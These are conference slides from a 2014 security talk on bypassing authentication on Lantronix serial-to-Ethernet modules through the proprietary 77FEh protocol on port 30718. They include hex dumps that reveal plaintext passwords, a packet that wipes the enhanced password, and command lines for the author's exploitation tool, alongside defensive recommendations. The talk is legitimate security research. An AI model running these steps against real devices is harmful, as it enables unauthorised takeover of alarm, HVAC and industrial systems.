1

MosEisleyLab

Confidence 2014

Exploring treasures of 77FEhGetting access to Lantronix devices

Vlatko Kosturjak, Diverto@k0st

2

MosEisleyLab

Who are you!?!!??

● Security Jedi at Diverto– Bringing balance to the force

● Experience– Offensive (Penetration tester)– Defensive (Developer/System Administrator/...)– Have code in: Nmap, Metasploit, OpenVAS, …– Author of free software: https://github.com/kost/

● If you trust in certificates– CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...

3

MosEisleyLab

Agenda

● Introduction - Lantronix● Physical access● WTF is 77FEh?● Vulnerabilities & Exploitation● Recommendations● Questions and answers

45 minutes

4

MosEisleyLab

Lantronix

Source: www.lantronix.com

5

MosEisleyLab

You can find them as integral part of

● Alarms● HVACs● Pool monitoring systems● Sprinkler controllers● Hacked vacuum cleaners - Roombas● Embedded systems● Industrial systems

Source:http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsArticle_Print&ID=904147&highlight

6

MosEisleyLab

What they are running actually?

● OS– CoBos (mostly)– Evolution OS/Linux– ThreadX– Linux

● Support– 1 or more serial ports– Modbus (few models)– 10/100 Ethernet

7

MosEisleyLab

Physical access

● Like usual– Game over

● Serial access– No password by design

● Requirements– Standard TTL cable– BusPirate– ...

8

MosEisleyLab

Connecting to serial port...

● 9600 bps 8/N/1● Flow control: None

9

MosEisleyLab

Most frequent services Available – TCP/IP

● Web (tcp/80)

● Telnet (tcp/9999)

● 77FEh (tcp-udp/30718)

● SNMP (udp/161)

Telnet administration interface

What is this?

Mostly information disclosures

Simple web serverServing applet JAR which talks

to 30718 port

10

MosEisleyLab

Device Discovery

● Ask :)● Look if you have physical access● Passive● Active/Scanning

– Standard port scanning is fine with conservative timing– Broadcast UDP to specific Lantronix ports (30718)

● Beware– Version scanning(-sV) or running vulnerability scanners

may misconfigure device–

11

MosEisleyLab

Telnet administration

$ telnet 192.168.1.101 9999

Trying 192.168.1.101...

Connected to 192.168.1.101.

Escape character is '^]'.

MAC address DEADDEADDEAD

Software version V5.8.8.3 (050801) XPTEXE

AES library version 1.8.2.1

Password :

12

MosEisleyLab

So, WTF is 77FEh finally?

● 0x77FE = 30718 (10)● TCP/UDP protocol for device setup

– Proprietary protocol– Used by DeviceInstaller (proprietary software from

Lantronix)● Designed for

– Setup of device– Administration of device– Getting device info– Insecurity (sorry, had to write it, you'll see later ;) )

13

MosEisleyLab

Sample 77FEh communication

[v] Sending 4 bytes:

0x00000000 (00000) 000000f6 ....

[v] Received 30 bytes:

(00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....

(00016) 62a7d944 00000000 00204a91 84fb b..D..... J...

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip>

Query setup request (4)

Query setup response (4) MAC address of the device (6)

Device type

14

MosEisleyLab

Interesting request – #1

● [v] Sending 4 bytes:● 0x00000000 (00000) 000000f8 ....●

● [v] Received 124 bytes:● 0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST● 0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L...........● 0x00000020 (00032) cc070000 00000000 00000000 00000000 ................● 0x00000030 (00048) 00000000 00000000 00000000 00000000 ................● 0x00000040 (00064) 00000000 00000000 00000000 00000000 ................● 0x00000050 (00080) 00000000 00000000 00000000 00000000 ................● 0x00000060 (00096) 00000000 00000000 00000000 00000000 ................● 0x00000070 (00112) 00000000 00000000 00000000 ............

Query setup (4)

SimplePassword

InPlaintext

(4)

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P <ip>

IPv4 (4)

15

MosEisleyLab

Previous – work

● Metasploit– Rob Vinson

● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/● https://github.com/robvinson/metasploit-modules

– Metasploit modules for simple passwords by jgor● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version

● Tools– Simple C program by jgor

● https://github.com/jgor/lantronix-telnet-pw

16

MosEisleyLab

But...

● Simple password is not set● Device still asks for password● Further digging

– Enhanced password in place– You cannot get/reset the enhanced password

easily– Length is bigger (4->16)– Challenge!!!

17

MosEisleyLab

Introduction to enhanced passwords

Source: Lantronix documentation

Feature/Type Simple Password Enhanced Password

Length 4 16

Visible in query setup

yes no

18

MosEisleyLab

Source:Mohdafri.com

19

MosEisleyLab

Interesting request - #2

[v] Sending 4 bytes:

0x00000000 (00000) 000000f4 ....

[v] Received 32 bytes:

0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST

0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3.........

0x00000020 (00032)

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C <ip>

SimplePassword

InPlaintext

(4)

Query ext versionRequest (4)

Version (6)

20

MosEisleyLab

Interesting request #3

● Request to query configuration

– 000000eX● Response to query

configuration– 000000bX +

followed by 126 bytes of setup

–

● X=number of setup records (0 – F):

– 0 basic setup record● Simple password, IP...

– 1 security record● Enhanced password,

AES key, SNMP...– 2 specific products /

situations– 3 OEMs– ...

Wrong! Request for security record 1 provides just zero bytes!

HALF

21

MosEisleyLab

Interesting request #4

● Request to change configuration

– 000000cX + followed by 126 bytes of setup

● Response to change configuration

– 000000bX–

● X=number of setup records (0 – F):

– 0 basic setup record

– 1 security record– 2 specific

products / situations

– 3 OEMs

22

MosEisleyLab

Setting setup record 1 for security

[v] Sending 130 bytes:

0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................

0x00000010 (00016) 00000000 00000000 00000000 00000000 ................

0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public....

0x00000030 (00048) 00000000 00000000 00000000 00000000 ................

0x00000040 (00064) 00000000 00000000 00000000 00000000 ................

0x00000050 (00080) 00000000 00000000 00000000 00000000 ................

0x00000060 (00096) 00000000 00000000 00000000 00000000 ................

0x00000070 (00112) 00000000 00000000 00000000 00000000 ................

0x00000080 (00128) 0000 ..

[v] Received 4 bytes:

0x00000000 (00000) 000000b1 ....

./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E <ip>

Setting Setup record 1Was successful

Set Setup record 1(security) request

SNMPCommunityString (13)

EnhancedPassword

(16)

23

MosEisleyLab

Enhanced password goneno password to enter!

$ telnet 192.168.1.101 9999

Trying 192.168.1.101...

Connected to 192.168.1.101.

Escape character is '^]'.

MAC address DEADDEADDEAD

Software version V5.8.8.3 (050801) XPTEXE

AES library version 1.8.2.1

Press Enter for Setup Mode

24

MosEisleyLab

Authentication Algorithm Guess

Authenticate

EnhancedPassword

SimplePassword

EnhancedNot set

Ask for enhanced

Ask for simple

Display setup menu

Enhancedset

Simpleset

SimpleNot set

PasswordOK

25

MosEisleyLab

New tool: lantronix-witchcraft

● 77FEh protocol implementation● 77FEh security related utility● All the tricks mentioned implemented● Free software: GPL2● Requirement: Perl● Available at

– https://github.com/kost/lantronix-witchcraft

26

MosEisleyLab

Basic usage:

● Display Mac address:

– ./lantronix-witchcraft.pl -Q <ip>

● Display Simple Password (up to 4 characters)

– ./lantronix-witchcraft.pl -P <ip>

● Reset Security record (together with enhanced password)

– ./lantronix-witchcraft.pl -E <ip>

● Reset Security record without AES (with enhanced password)

– ./lantronix-witchcraft.pl -S <ip>

● Dump setup records

– ./lantronix-witchcraft.pl -G -D <ip>

27

MosEisleyLab

Brave enough?

● One command to rule them all

● Display Mac address and simple password, dump setup records, reset security records together with enhanced password:

–

– ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip>

●

28

MosEisleyLab

Still wondering why automatic scanning

is bad for Lantronix?●

● Dump of setup record:00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y|

00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0|

00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{|

00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0|

00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|

29

MosEisleyLab

Correct way

● Ask– Someone responsible if they could have something like that

● Send broadcast query packet to 77FEh● Identify ports 30718 open (TCP or UDP)● Dump setup records ● Play ;)● Check if it is still working...

– If yes, perfect– If not: huh, but you should restore setup records somehow ;)

30

MosEisleyLab

It's not about Lantronix...

● ...they warned the vendors about it in their documentation

Source: Lantronix documentation

31

MosEisleyLab

Disclosure Problem

● It's more about vendors who implement Lantronix in their devices

● Whom to report?– Lantronix – I guess they know their protocol ;)– OEMs – hard to find all their customers ;)

● Awareness– Conference– Tools

32

MosEisleyLab

But maybe it could be done...

● Add white list● Encryption/SSL?

Source: Lantronix documentation

33

MosEisleyLab

Recommendations

● Have some other device to VPN/SSL tunnel the services

● Telnet only through VPN or other secure channel to administration interface

● Disable 77FEh if not needed● Filter out 77FEh on network devices to only

allowed ones● Disable other unneccesary services (SNMP,

telnet, etc).

34

MosEisleyLab

Summary

Source: duki@fb

35

MosEisleyLab

Summary

● There are ways to pass beyond authentication (if 77FEh is enabled)– Simple passwords– Enhanced passwords

● Tools– Metasploit Lantronix modules– https://github.com/kost/lantronix-witchcraft

● Recommendations– Disable 77FEh if not needed or Filter out 77FEh on network devices to only

allowed ones– Tunnel VPN/SSL all communication to these devices

● Future– There are things to research: way to obtain enhanced password or AES keys

for example

36

MosEisleyLab

Acknowledgements - Thanks

● Previous work (Simple Passwords)– Rob Vinson

● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/● https://github.com/robvinson/metasploit-modules

– Metasploit modules for simple passwords by jgor● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version● https://github.com/jgor/lantronix-telnet-pw

● Colleagues– Dalibor Dosegović, hardware wizard

37

MosEisleyLab

Thank you!

Questions and Answers@k0st